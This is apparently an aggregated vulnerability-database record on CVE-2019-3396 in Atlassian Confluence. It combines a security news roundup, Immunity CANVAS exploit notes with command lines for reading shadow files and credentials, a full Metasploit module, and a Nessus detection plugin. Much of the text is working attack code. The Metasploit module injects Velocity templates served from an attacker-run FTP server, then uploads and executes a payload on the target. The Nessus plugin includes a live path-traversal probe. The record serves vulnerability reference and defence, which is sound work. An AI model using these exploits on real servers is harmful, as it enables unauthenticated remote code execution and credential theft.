technology market researchers [Vanson Bourne](<https://www.vansonbourne.com/>) questioned 600 IT operations and IT security decision-makers across the U.S. 
and U.K., and found that 60% of the organizations had been breached in the last two years and 31% had been breached more than once._\n\n**[AESDDoS Botnet Malware Exploits CVE-2019-3396 to Perform Remote Code Execution, DDoS Attacks, and Cryptocurrency Mining](<https://blog.trendmicro.com/trendlabs-security-intelligence/aesddos-botnet-malware-exploits-cve-2019-3396-to-perform-remote-code-execution-ddos-attacks-and-cryptocurrency-mining/>)**\n\n_Trend Micro\u2019s honeypot sensors detected an AESDDoS botnet malware variant exploiting a server-side template injection vulnerability in a collaboration software program used by DevOps professionals._\n\n**[U.K. Prime Minister Theresa May Fires Defense Secretary Gavin Williamson Over Huawei Leak](<https://www.wsj.com/articles/u-k-government-fires-defense-secretary-gavin-williamson-over-huawei-leak-11556730704?emailToken=c7b9429b764699bae6432797f41319e4VriXbJEl2XSmmRWhaSOya86yVbzGG0UPjolqJ1JrGopNw3/e3uWGf9WgE427fJv/w16A82NBLDVMdDHOYyg0EHAaRSX2xAVeI37+zsXScE96s/8VMQVp/UWs7GMf/OVQjcyichuRgH5tqE0hFy4Wgg%3D%3D&reflink=article_copyURL_share>)**\n\n_British Prime Minister Theresa May fired Defense Secretary Gavin Williamson, saying he leaked sensitive information surrounding a review into the use of equipment from China\u2019s Huawei Technologies Co. in the U.K.\u2019s telecoms network._\n\n**[This Hacker Is Selling Dangerous Windows 0-Day Hacks For Past 3 Years](<https://fossbytes.com/hacker-selling-dangerous-windows-zero-day-hacks-for-3-years/>)**\n\n_A report by [ZDNet](<https://www.zdnet.com/article/mysterious-hacker-has-been-selling-windows-0-days-to-apt-groups-for-three-years/#modal-absolute-f920f6d6-bb7b-4fdc-a2f1-cdd69c36ee85>) has revealed that a mysterious hacker has been selling Windows zero-day exploits to the world\u2019s most notorious cybercrime groups for the past three years. 
At least three cyber-espionage groups, also known as Advanced Persistent Threats (APTs), are regular customers of this hacker._\n\n**[Docker Hub Repository Suffers Data Breach, 190,000 Users Potentially Affected](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/docker-hub-repository-suffers-data-breach-190-000-users-potentially-affected>)**\n\n_In an email sent to their customers on April 26, Docker reported that the online repository of their popular container platform suffered a data breach that affected 190,000 users._\n\n**[IC3: BEC Cost Organizations US$1.2 Billion in 2018](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ic3-bec-cost-organizations-us-1-2-billion-in-2018>)**\n\n_In the recently published 2018 Internet Crime Report by the FBI\u2019s Internet Crime Complaint Center (IC3), the agency states that in 2018 alone, it received 20,373 BEC/email account compromise (EAC) complaints that racked up a total of over US$1.2 billion in adjusted losses._\n\n**[Trend Forward Capital\u2019s First Startup Pitch Competition in Dallas](<https://dallasinnovates.com/deadline-tuesday-for-trend-forward-capitals-1st-startup-pitch-competition-in-dallas/>)**\n\n_Trend Forward Capital, in a partnership with Veem, is bringing its Forward Thinker Award and pitch competition to Dallas on May 20._\n\n**[BEC Scammers Steal US$1.75 Million From an Ohio Church](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/bec-scammers-steal-us-1-75-million-from-an-ohio-church>)**\n\n_The Saint Ambrose Catholic Parish in Brunswick, Ohio was the victim of a BEC attack when cybercriminals gained access to employee email accounts and used them to trick other members of the organization into wiring the payments into a fraudulent bank account._\n\n**[Cybersecurity Experts Share Tips And Insights For World Password 
Day](<https://www.forbes.com/sites/tonybradley/2019/05/02/cybersecurity-experts-share-tips-and-insights-for-world-password-day/#7fe9a6dc5c2e>)**\n\n_May 2 is World Password Day. World Password Day falls on the first Thursday in May each year and is intended to raise awareness of password best practices and the need for strong passwords._\n\n**[Confluence Vulnerability Opens Door to GandCrab](<https://www.darkreading.com/vulnerabilities---threats/confluence-vulnerability-opens-door-to-gandcrab/d/d-id/1334577>)**\n\n_A vulnerability in a popular devops tool could leave companies with a dose of ransomware to go with their organizational agility, according to researchers at Trend Micro and Alert Logic._\n\nWere you surprised by the number of business email compromise complaints the FBI received in 2018? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay](<https://twitter.com/jonlclay>).\n\nThe post [This Week in Security News: BEC Attacks and Botnet Malware](<https://blog.trendmicro.com/this-week-in-security-news-bec-attacks-and-botnet-malware/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-05-03T14:00:25", "published": "2019-05-03T14:00:25", "id": "TRENDMICROBLOG:0EF9DC5097F65BD1DE3DF56D0170F328", "href": "https://blog.trendmicro.com/this-week-in-security-news-bec-attacks-and-botnet-malware/", "type": "trendmicroblog", "title": "This Week in Security News: BEC Attacks and Botnet Malware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-12-11T14:23:09", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "description": "**Name**| confluence_macro_lfi \n---|--- \n**CVE**| CVE-2019-3396 \n**Exploit Pack**| [CANVAS](<http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Confluence Server and Data Center - LFI (CVE-2019-3396) \n**Notes**| Repeatability: \nNOTES: \n \n \nA] Default behavior \n=================== 
\n \nBy default, this module attempts to automatically locate and then fetch \nthe Confluence database. This is possible thanks to the fact that \nthe LFI primitive turns into a directory listing whenever a directory \nis specified instead of a file. \n \nTo perform the attack from the CLI, one may type the following from $CANVAS_ROOT (it takes some time): \npython2 exploits/remote/universal/confluence_macro_lfi/confluence_macro_lfi.py -t 10.161.0.241 -p 8090 -Ovhost:'10.161.0.241' \n \nThere are, however, a couple of limitations: \n \n1\\. The search algorithm is rather naive and will not be able to handle \ninstallations with non-standard installation paths. \n \n2\\. A huge problem with Confluence is the way Java handles memory when \nthe LFI primitive is used. Because of this, whenever the file included \nwith the LFI primitive is too big (a couple of megabytes), the server process \nmay actually crash, being unable to allocate enough memory. This is in particular \ntrue of the Confluence database, which is more than 20 megabytes initially. \n \nNote: Linux seems much less stable than Windows in that regard. \n \n3\\. There is a limit to how much the server can send. Our tests show, though, \nthat most of the time the partial DB, while truncated, will still include \nuser information (potentially including user password hashes, which may later be cracked). \n \n \nB] Targeting arbitrary files \n============================ \n \nFirst of all, it should be noted that absolute paths can be used \nby the attacker on both directories (directory listing) and files (file inclusion); \nthus, depending on the configuration of the Confluence service, several things \ncould be attempted: \n \n\\- Kerberos ticket retrieval \n\\- Shadow file leak (if Confluence is running as root) \n\\- Any sensitive credentials in general without ACL protection \n \nThis may or may not lead to RCE. \n \n \n1\\. 
Linux examples \n\\----------------- \n \n# Chosen absolute path: \npython2 exploits/remote/universal/confluence_macro_lfi/confluence_macro_lfi.py -t 10.161.0.239 -p 8090' \n \n \n2\\. Windows examples \n\\------------------- \n \n# Chosen relative path: \npython2 exploits/remote/universal/confluence_macro_lfi/confluence_macro_lfi.py -t 10.161.0.241 -p 8090 -Oremote_file:../web.xml \n \n# Chosen absolute path: \npython2 exploits/remote/universal/confluence_macro_lfi/confluence_macro_lfi.py -t 10.161.0.241 -p 8090 -Oremote_file:'C:\\windows\\win.ini' \n \nTested against: \n\\- Confluence 6.6.11 (Ubuntu) \n\\- Confluence 6.10.1 (Windows 2008 R2) \n \n \nVENDOR: Atlassian \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396 \nCVE Name: CVE-2019-3396 \n\n", "edition": 1, "modified": "2019-03-25T19:29:00", "published": "2019-03-25T19:29:00", "id": "CONFLUENCE_MACRO_LFI", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/confluence_macro_lfi", "title": "Immunity Canvas: CONFLUENCE_MACRO_LFI", "type": "canvas", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "description": "File disclosure vulnerability in Confluence widget connector macro\n\nVulnerability Type: File Disclosure", "modified": "2019-03-28T00:00:00", "published": "2019-03-28T00:00:00", "id": "E-686", "href": "", "type": "dsquare", "title": "Confluence File Disclosure", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2019-04-19T14:21:33", "description": "", "published": "2019-04-19T00:00:00", "type": "exploitdb", "title": "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "modified": "2019-04-19T00:00:00", "id": 
"EDB-ID:46731", "href": "https://www.exploit-db.com/exploits/46731", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::FtpServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Atlassian Confluence Widget Connector Macro Velocity Template Injection\",\r\n 'Description' => %q{\r\n The Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\r\n allows embedding online videos, slideshows, photostreams and more directly into a page.\r\n A _template parameter can be used to inject remote Java code into a Velocity template,\r\n and gain code execution. Authentication is not required to exploit this vulnerability.\r\n By default, a Java payload will be used because it is cross-platform, but you can also\r\n specify which native payload you want (Linux or Windows).\r\n\r\n Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\r\n 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\r\n\r\n This vulnerability was originally discovered by Daniil Dmitriev\r\n https://twitter.com/ddv_ua.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Daniil Dmitriev', # Discovering vulnerability\r\n 'Dmitry (rrock) Shchannikov' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2019-3396' ],\r\n [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],\r\n [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-\u3010CVE-2019-3396\u3011-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],\r\n [ 'URL', 'https://paper.seebug.org/886/']\r\n ],\r\n 'Targets' =>\r\n [\r\n [ 'Java', { 
'Platform' => 'java', 'Arch' => ARCH_JAVA }],\r\n [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],\r\n [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 8090,\r\n 'SRVPORT' => 8021,\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Mar 25 2019',\r\n 'DefaultTarget' => 0,\r\n 'Stance' => Msf::Exploit::Stance::Aggressive\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to Confluence', '/']),\r\n OptString.new('TRIGGERURL', [true, 'URL of the external video service used to trigger the vulnerability',\r\n 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])\r\n ])\r\n end\r\n\r\n # Handles the ftp RETR command.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] RETR argument.\r\n # @return [void]\r\n def on_client_command_retr(c, arg)\r\n vprint_status(\"FTP download request for #{arg}\")\r\n conn = establish_data_connection(c)\r\n if(not conn)\r\n c.put(\"425 Can't build data connection\\r\\n\")\r\n return\r\n end\r\n\r\n c.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\")\r\n case arg\r\n when /check\\.vm$/\r\n conn.put(wrap(get_check_vm))\r\n when /javaprop\\.vm$/\r\n conn.put(wrap(get_javaprop_vm))\r\n when /upload\\.vm$/\r\n conn.put(wrap(get_upload_vm))\r\n when /exec\\.vm$/\r\n conn.put(wrap(get_exec_vm))\r\n else\r\n conn.put(wrap(get_dummy_vm))\r\n end\r\n c.put(\"226 Transfer complete.\\r\\n\")\r\n conn.close\r\n end\r\n\r\n # Handles the ftp PASS command to suppress output.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] PASS argument.\r\n # @return [void]\r\n def on_client_command_pass(c, arg)\r\n @state[c][:pass] = arg\r\n vprint_status(\"#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}\")\r\n c.put \"230 Login OK\\r\\n\"\r\n end\r\n\r\n # Handles the ftp EPSV command to suppress output.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] 
EPSV argument.\r\n # @return [void]\r\n def on_client_command_epsv(c, arg)\r\n vprint_status(\"#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'\")\r\n c.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\")\r\n end\r\n\r\n # Returns an upload template.\r\n #\r\n # @return [String]\r\n def get_upload_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))\r\n EOF\r\n )\r\n end\r\n\r\n # Returns a command execution template.\r\n #\r\n # @return [String]\r\n def get_exec_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()\r\n EOF\r\n )\r\n end\r\n\r\n # Returns the vulnerability-check template.\r\n #\r\n # @return [String]\r\n def get_check_vm\r\n (\r\n <<~EOF\r\n #{@check_text}\r\n EOF\r\n )\r\n end\r\n\r\n # Returns a template that reads a Java system property.\r\n #\r\n # @return [String]\r\n def get_javaprop_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()\r\n EOF\r\n )\r\n end\r\n\r\n # Returns a dummy (empty) template.\r\n #\r\n # @return [String]\r\n def get_dummy_vm\r\n (\r\n <<~EOF\r\n EOF\r\n )\r\n end\r\n\r\n # Checks the vulnerability.\r\n #\r\n # @return [Array] Check code\r\n def check\r\n checkcode = Exploit::CheckCode::Safe\r\n begin\r\n # Start the FTP service\r\n print_status(\"Starting the FTP server.\")\r\n start_service\r\n\r\n @check_text = Rex::Text.rand_text_alpha(5..10)\r\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm\")\r\n if res && res.body && res.body.include?(@check_text)\r\n checkcode = Exploit::CheckCode::Vulnerable\r\n end\r\n rescue Msf::Exploit::Failed => 
e\r\n vprint_error(e.message)\r\n checkcode = Exploit::CheckCode::Unknown\r\n end\r\n checkcode\r\n end\r\n\r\n # Injects Java code into the template.\r\n #\r\n # @param service_url [String] Address of the template to inject.\r\n # @param timeout [Integer] HTTP timeout in seconds.\r\n # @return [Rex::Proto::Http::Response, nil] Server response, or nil if the request timed out.\r\n def inject_template(service_url, timeout=20)\r\n\r\n uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'headers' => {\r\n 'Accept' => '*/*',\r\n 'Origin' => full_uri(vhost_uri: true)\r\n },\r\n 'ctype' => 'application/json; charset=UTF-8',\r\n 'data' => {\r\n 'contentId' => '1',\r\n 'macro' => {\r\n 'name' => 'widget',\r\n 'body' => '',\r\n 'params' => {\r\n 'url' => datastore['TRIGGERURL'],\r\n '_template' => service_url\r\n }\r\n\r\n }\r\n }.to_json\r\n }, timeout=timeout)\r\n\r\n unless res\r\n unless service_url.include?(\"exec.vm\")\r\n print_warning('Connection timed out in #inject_template')\r\n end\r\n return\r\n end\r\n\r\n if res.body.include? 
'widget-error'\r\n print_error('Failed to inject and execute code:')\r\n else\r\n vprint_status(\"Server response:\")\r\n end\r\n\r\n vprint_line(res.body)\r\n\r\n res\r\n end\r\n\r\n # Returns a system property for Java.\r\n #\r\n # @param prop [String] Name of the property to retrieve.\r\n # @return [String]\r\n def get_java_property(prop)\r\n @prop = prop\r\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\")\r\n if res && res.body\r\n return clear_response(res.body)\r\n end\r\n ''\r\n end\r\n\r\n # Returns the target platform.\r\n #\r\n # @return [String]\r\n def get_target_platform\r\n return get_java_property('os.name')\r\n end\r\n\r\n # Checks if the target os/platform is compatible with the module target or not.\r\n #\r\n # @return [TrueClass] Compatible\r\n # @return [FalseClass] Not compatible\r\n def target_platform_compat?(target_platform)\r\n target.platform.names.each do |n|\r\n if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)\r\n return true\r\n end\r\n end\r\n\r\n false\r\n end\r\n\r\n # Returns a temp path from the remote target.\r\n #\r\n # @return [String]\r\n def get_tmp_path\r\n return get_java_property('java.io.tmpdir')\r\n end\r\n\r\n # Returns the Java home path used by Confluence.\r\n #\r\n # @return [String]\r\n def get_java_home_path\r\n return get_java_property('java.home')\r\n end\r\n\r\n # Returns Java code that can be used to inject to the template in order to copy a file.\r\n #\r\n # @note The purpose of this method is to have a file that is not busy, so we can execute it.\r\n # It is meant to be used with #get_write_file_code.\r\n #\r\n # @param fname [String] The file to copy\r\n # @param new_fname [String] The new file\r\n # @return [void]\r\n def get_dup_file_code(fname, new_fname)\r\n if fname =~ /^\\/[[:print:]]+/\r\n @command = \"cp #{fname} #{new_fname}\"\r\n else\r\n @command = \"cmd.exe /C copy #{fname} #{new_fname}\"\r\n 
end\r\n\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\r\n end\r\n\r\n # Returns the normalized file path for the payload.\r\n #\r\n # @return [String]\r\n def normalize_payload_fname(tmp_path, fname)\r\n # A quick way to check the platform instead of actually grabbing os.name from the Java system properties.\r\n if /^\\/[[:print:]]+/ === tmp_path\r\n Rex::FileUtils.normalize_unix_path(tmp_path, fname)\r\n else\r\n Rex::FileUtils.normalize_win_path(tmp_path, fname)\r\n end\r\n end\r\n\r\n # Exploits the target on the Java platform.\r\n #\r\n # @return [void]\r\n def exploit_as_java\r\n\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\")\r\n @b64 = Rex::Text.encode_base64(payload.encoded_jar)\r\n @command = ''\r\n\r\n java_home = get_java_home_path\r\n\r\n if java_home.blank?\r\n fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')\r\n else\r\n vprint_status(\"Found Java home path: #{java_home}\")\r\n end\r\n\r\n register_files_for_cleanup(@fname)\r\n\r\n if /^\\/[[:print:]]+/ === @fname\r\n normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')\r\n @command = %Q|#{normalized_java_path} -jar #{@fname}|\r\n else\r\n normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe')\r\n @fname.gsub!(/Program Files/, 'PROGRA~1')\r\n @command = %Q|cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname}|\r\n end\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n print_status(\"Attempting to execute #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n 
end\r\n\r\n\r\n # Exploits the target on the Windows platform.\r\n #\r\n # @return [void]\r\n def exploit_as_windows\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\r\n @fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\r\n new_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\r\n @fname.gsub!(/Program Files/, 'PROGRA~1')\r\n new_fname.gsub!(/Program Files/, 'PROGRA~1')\r\n register_files_for_cleanup(@fname, new_fname)\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n print_status(\"Attempting to copy payload to #{new_fname}\")\r\n get_dup_file_code(@fname, new_fname)\r\n\r\n print_status(\"Attempting to execute #{new_fname}\")\r\n @command = new_fname\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n\r\n # Exploits the target on the Linux platform.\r\n #\r\n # @return [void]\r\n def exploit_as_linux\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\r\n @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))\r\n new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))\r\n register_files_for_cleanup(@fname, new_fname)\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n @command = \"chmod +x #{@fname}\"\r\n 
inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\r\n\r\n print_status(\"Attempting to copy payload to #{new_fname}\")\r\n get_dup_file_code(@fname, new_fname)\r\n\r\n print_status(\"Attempting to execute #{new_fname}\")\r\n @command = new_fname\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n def exploit\r\n @wrap_marker = Rex::Text.rand_text_alpha(5..10)\r\n\r\n # Start the FTP service\r\n print_status(\"Starting the FTP server.\")\r\n start_service\r\n\r\n target_platform = get_target_platform\r\n if target_platform.nil?\r\n fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".')\r\n else\r\n print_status(\"Target being detected as: #{target_platform}\")\r\n end\r\n\r\n unless target_platform_compat?(target_platform)\r\n fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')\r\n end\r\n\r\n case target.name.downcase\r\n when /java$/\r\n exploit_as_java\r\n when /windows$/\r\n exploit_as_windows\r\n when /linux$/\r\n exploit_as_linux\r\n end\r\n end\r\n\r\n # Wraps request.\r\n #\r\n # @return [String]\r\n def wrap(string)\r\n \"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\"\r\n end\r\n\r\n # Returns unwrapped response.\r\n #\r\n # @return [String]\r\n def clear_response(string)\r\n if match = string.match(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m)\r\n return match.captures[0]\r\n end\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/46731"}], "nessus": [{"lastseen": "2020-05-03T01:56:50", "description": "According to the tests performed by Nessus, the remote host\nis affected by the following vulnerability:\n\n - A server-side template injection exists in the Widget\n Connector due to 
improper input validation. An attacker\n can exploit this, via unspecified vectors, to traverse\n directories or execute arbitrary code. (CVE-2019-3396)", "edition": 10, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-11T00:00:00", "title": "Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Template Injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-3396"], "modified": "2019-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2019-3396.NASL", "href": "https://www.tenable.com/plugins/nessus/124004", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124004);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/01\");\n\n script_cve_id(\"CVE-2019-3396\");\n script_xref(name:\"IAVA\", value:\"2019-A-0135-S\");\n\n script_name(english:\"Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Template Injection\");\n script_summary(english:\"Checks the Atlassian Confluence instance for a template injection.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by\na template injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the tests performed by Nessus, the remote host\nis affected by the following vulnerability:\n\n - A server-side template injection exists in the Widget\n Connector due to improper input validation. An attacker\n can exploit this, via unspecified vectors, to traverse\n directories or execute arbitrary code. 
(CVE-2019-3396)\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8e8304c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.6.12, 6.12.3, 6.13.3,\n6.14.2, 6.15.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-3396\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Confluence File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Widget Connector Macro Velocity Template Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp_name = 'confluence';\n\nport = get_http_port(default:8090);\n\napp_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\npath = app_info['path'];\nif(path[strlen(path)-1] != '/') path += '/';\n\nitem = path + 'rest/tinymce/1/macro/preview';\nheader = {'Content-Type':'application/json','User-Agent':''};\ndata = '{\"contentId\":\"1337\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":' +\n '{\"url\":\"http://localhost//www.youtube.com/watch?v=w0gtNxBWIEY\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}';\n\nres = http_send_recv3(method:'POST', item:item, port:port, add_headers:header, data:data, exit_on_fail:TRUE);\n\nif('</web-app>' >< res[2])\n security_report_v4(severity:SECURITY_HOLE, port:port, generic:TRUE, request:[http_last_sent_request()]);\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'Atlassian Confluence', build_url(qs:path, port:port));\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T13:25:47", "description": "According to its self-reported version number, the Atlassian\nConfluence application running on the remote host is prior to 6.6.12,\n6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to\n6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the\n WebDAV plugin due to improper input validation. 
